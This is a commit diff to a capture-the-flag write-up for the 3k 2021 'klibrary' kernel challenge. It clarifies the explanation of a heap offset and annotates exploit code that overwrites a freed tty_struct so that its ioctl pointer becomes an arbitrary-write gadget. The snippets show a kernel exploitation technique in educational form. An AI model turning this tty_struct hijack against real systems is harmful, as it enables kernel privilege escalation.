3k klibrary better explanation of +32

Author: meowmeowxw

ctf/3k-2021-klibrary/README.md

@@ -929,9 +929,8 @@ Because in this way after a `remove(1); open("/dev/ptmx")` with:
 - `get_book_description(0)` I can read the tty_struct
 - `add_description_to_book(0)` I can overwrite the tty_struct
 
-The +32 is needed to rewrite the `index, next, prev` of the book0 through an
-`add_description_to_book(1)`, a bit messy I know. In reality this is handled in the
-code so it's not useful but I discovered it only after I've already implemented it.
+The +32 is needed to not overwrite the `index, next, prev` of `book0`, otherwise
+we couldn't access `book0` if we overwrite `book0` with `book1`.
 
 We also need luck and hope that tty_struct doesn't overwrite the index of `book0` or 
 we can't access `book0` anymore (spoiler: we have luck)
@@ -1046,10 +1045,11 @@ So my plan was the following (in red the tty_struct):
     ((uint64_t *)buf)[32 / 8] = dummy_ret; // cleanup functions
     ((uint64_t *)buf)[40 / 8] = dummy_ret;
     ((uint64_t *)buf)[48 / 8] = dummy_ret;
-    ((uint64_t *)buf)[96 / 8] = mov_addr_rdx_esi; // write
+    ((uint64_t *)buf)[96 / 8] = mov_addr_rdx_esi; // ioctl function -> arbitrary write
     ioctl_add_desc(2, buf);
     ioctl_get_desc(2, buf);
 
+    // This part is not needed
     book_details b = {
         .index = 0,
         .next = (void *)(heap_ptr + 32),